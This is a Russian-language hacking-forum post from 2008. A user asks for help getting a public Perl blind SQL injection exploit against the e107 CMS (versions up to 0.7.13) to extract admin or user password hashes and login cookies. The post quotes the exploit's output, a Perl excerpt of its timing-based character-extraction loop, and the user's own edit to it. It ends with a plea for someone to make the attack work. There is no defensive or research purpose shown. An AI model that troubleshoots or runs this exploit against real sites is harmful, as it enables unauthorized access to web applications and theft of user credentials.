Показать сообщение отдельно

  #5  
Старый 10.11.2008, 09:46
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию

Цитата:
Привет всем!
есть уязвимость "e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit"
вот эксплоит: http://www.securitylab.ru/poc/extra/361578.php
После того, как изменил $benchmark, вроде заработало, но теперь выдаёт такое:
Код:
[+] e107 <= 0.7.13 Blind SQL Injection
[+] Admin/User's Password Retrieve Exploit
[+] Coded by __GiReX__

[+] Logged in with your account..
[+] Checking database delay, please wait..

[+] Normal delay: 1
[+] Benchmark delay: 13

[+] Victim password: f

[-] Exploit mistake: please re-check benchmark
Я так понимаю, загвоздка где-то здесь:
Код:
for(my $j = 1; $j <= 32; $j++)
{  
    foreach $char(@cset)
    {    
        info(chr($char), $hash, "password");
        
        my ($pre_time, $post_time) = time();
        $rv = check_char($char, $j, "user_password");    
        $post_time = time();
    
             if($rv and ($post_time - $pre_time) > ($ndelay + 3))
             {        
                 $hash .= chr($char);
                 last;
             }
    }
    
    last if $j != length($hash);
}    

if(not defined $hash or length($hash) != 32)
{
    print STDOUT "\n\n[-] Exploit mistake: please re-check benchmark\n";
    exit;
}
Изменил строку "if(not defined $hash or length($hash) != 32)" на "if(not defined $hash)" и скрипт мне выдал:
Код:
...
[+] Logged in with your account..
[+] Checking database delay, please wait..

[+] Normal delay: 1
[+] Benchmark delay: 13

[+] Victim password: f

[+] You can try to login with this cookie:
[+] Cookie: e107cookie=1.d41d8cd98f00b204e9800998ecf8427e
length(d41d8cd98f00b204e9800998ecf8427e) = 32

Я подставил эти куки, но они не подходят. потом попробовал эксплоит на localhoste и до меня дошло, что он всегда выдаёт один и тот же хэш. В нём зашифрован пароль "".
Так что же делать? как заставить скрипт работать? подскажите плиз, я в программировании не бум-бум.
 
Ответить с цитированием